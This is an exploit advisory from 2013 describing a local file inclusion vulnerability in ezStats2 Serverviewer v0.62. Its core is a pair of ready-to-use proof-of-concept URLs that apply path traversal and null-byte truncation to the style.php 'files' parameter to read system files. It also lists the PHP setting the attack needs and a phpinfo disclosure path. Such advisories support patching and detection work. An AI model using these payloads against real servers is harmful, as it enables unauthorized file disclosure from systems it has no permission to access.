################################################# ### Exploit Title: ezStats2 Serverviewer v0.62 Local File Inclusion Vulnerability ### Date: 02/05/2013 ### Author: L0n3ly-H34rT ### Contact: l0n3ly_h34rt@hotmail.com ### My Site: http://se3c.blogspot.com/ ### Vendor Link: http://www.ezstats.org/ ### Software Link: http://ezstats.googlecode.com/files/ezStats2_Serverviewer_v0.62.zip ### Tested on: Linux/Windows ################################################# http://127.0.0.1/ezServer/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg http://127.0.0.1/ezServer/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg ############################################ # Notes : 1- Must be magic_quotes_gpc = Off 2- phpinfo() : http://127.0.0.1/ezServer/admin/apitest.php?info # Greetz to my friendz